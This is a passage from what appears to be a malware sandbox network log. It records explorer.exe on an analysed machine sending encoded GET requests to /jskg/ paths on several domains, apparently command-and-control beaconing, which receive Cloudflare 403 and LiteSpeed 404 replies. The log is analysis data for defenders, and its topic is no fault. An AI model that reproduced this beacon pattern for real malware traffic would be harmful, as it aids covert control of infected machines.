74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="
Nov 21, 2023 03:31:19.463700056 CET	180	IN	Data Raw: 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 Data Ascii: noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/
Nov 21, 2023 03:31:19.463712931 CET	182	IN	Data Raw: 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a Data Ascii: <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two">
Nov 21, 2023 03:31:19.463727951 CET	183	IN	Data Raw: 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 Data Ascii: border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">82958409eace2012</strong></span> <span class="cf-footer-separator sm:hidden">•</span> <spa
Nov 21, 2023 03:31:19.463741064 CET	183	IN	Data Raw: 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f Data Ascii: </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	23.227.38.74	80	192.168.2.5	49718	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:31:50.310123920 CET	197	OUT	GET /jskg/?yV3lvHf=YCW0/yd7C01aElrhcPhS/kt9m722krufJvCDJvN/MprEBXvxMY86CRBbv2aG0eSAUYQv&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.erotictoybox.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:31:50.441792011 CET	199	IN	HTTP/1.1 403 Forbidden Date: Tue, 21 Nov 2023 02:31:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4515 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: max-age=15 Expires: Tue, 21 Nov 2023 02:32:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=omfUeHiTJDD66dyoVCutoz78sBmapGqz6PKgBdHu9APnwo3knvupiE7ld9pTsOUedJlsNBBhoOTOMWVza6nc%2BSxHBsSlUuBzL1uvM64LV6s3C2EW61SgSFxubYt7rgze46OTtmZE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Server-Timing: cfRequestDuration;dur=6.999969 Server: cloudflare CF-RAY: 829584cbb99b0658-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofo
Nov 21, 2023 03:31:50.441823959 CET	200	IN	Data Raw: 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 Data Ascii: llow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/style
Nov 21, 2023 03:31:50.441837072 CET	201	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 Data Ascii: <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class=
Nov 21, 2023 03:31:50.441848040 CET	203	IN	Data Raw: 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 Data Ascii: 300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">829584cbb99b0658</strong></span> <span class="cf-footer-separator sm:hidden">•</span> <span id="cf-foot
Nov 21, 2023 03:31:50.441859007 CET	203	IN	Data Raw: 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f Data Ascii: /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49718	23.227.38.74	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:31:50.310123920 CET	197	OUT	GET /jskg/?yV3lvHf=YCW0/yd7C01aElrhcPhS/kt9m722krufJvCDJvN/MprEBXvxMY86CRBbv2aG0eSAUYQv&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.erotictoybox.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:31:50.441792011 CET	199	IN	HTTP/1.1 403 Forbidden Date: Tue, 21 Nov 2023 02:31:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4515 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: max-age=15 Expires: Tue, 21 Nov 2023 02:32:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=omfUeHiTJDD66dyoVCutoz78sBmapGqz6PKgBdHu9APnwo3knvupiE7ld9pTsOUedJlsNBBhoOTOMWVza6nc%2BSxHBsSlUuBzL1uvM64LV6s3C2EW61SgSFxubYt7rgze46OTtmZE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Server-Timing: cfRequestDuration;dur=6.999969 Server: cloudflare CF-RAY: 829584cbb99b0658-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofo
Nov 21, 2023 03:31:50.441823959 CET	200	IN	Data Raw: 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 Data Ascii: llow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/style
Nov 21, 2023 03:31:50.441837072 CET	201	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 Data Ascii: <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class=
Nov 21, 2023 03:31:50.441848040 CET	203	IN	Data Raw: 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 Data Ascii: 300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">829584cbb99b0658</strong></span> <span class="cf-footer-separator sm:hidden">•</span> <span id="cf-foot
Nov 21, 2023 03:31:50.441859007 CET	203	IN	Data Raw: 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f Data Ascii: /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49719	167.172.69.40	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:32:02.056719065 CET	204	OUT	GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.lactationdrink.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:32:02.474802017 CET	205	IN	HTTP/1.1 404 Not Found content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache content-length: 1236 date: Tue, 21 Nov 2023 02:32:02 GMT server: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Pleas
Nov 21, 2023 03:32:02.474838972 CET	205	IN	Data Raw: 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 Data Ascii: e be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	167.172.69.40	80	192.168.2.5	49719	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:32:02.056719065 CET	204	OUT	GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.lactationdrink.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:32:02.474802017 CET	205	IN	HTTP/1.1 404 Not Found content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache content-length: 1236 date: Tue, 21 Nov 2023 02:32:02 GMT server: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 